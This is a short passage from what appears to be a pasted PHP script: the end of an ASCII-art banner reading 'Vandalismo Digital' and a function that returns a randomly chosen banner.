  3851. ", "{$_SESSION["c1"]}
  3852. __     __              _       _ _                       ____  _       _ _        _
  3853. \ \   / /_ _ _ __   __| | __ _| (_)___ _ __ ___   ___   |  _ \(_) __ _(_) |_ __ _| |
  3854.  \ \ / / _` | '_ \ / _` |/ _` | | / __| '_ ` _ \ / _ \  | | | | |/ _` | | __/ _` | |
  3855.   \ V / (_| | | | | (_| | (_| | | \__ \ | | | | | (_) | | |_| | | (_| | | || (_| | |
  3856.    \_/ \__,_|_| |_|\__,_|\__,_|_|_|___/_| |_| |_|\___/  |____/|_|\__, |_|\__\__,_|_|
  3857.                                                                  |___/              
  3858. ");
  3859.     return ($banners[rand(0, count($banners) - 1)]);
  3860. }
Add Comment
Please, Sign In to add comment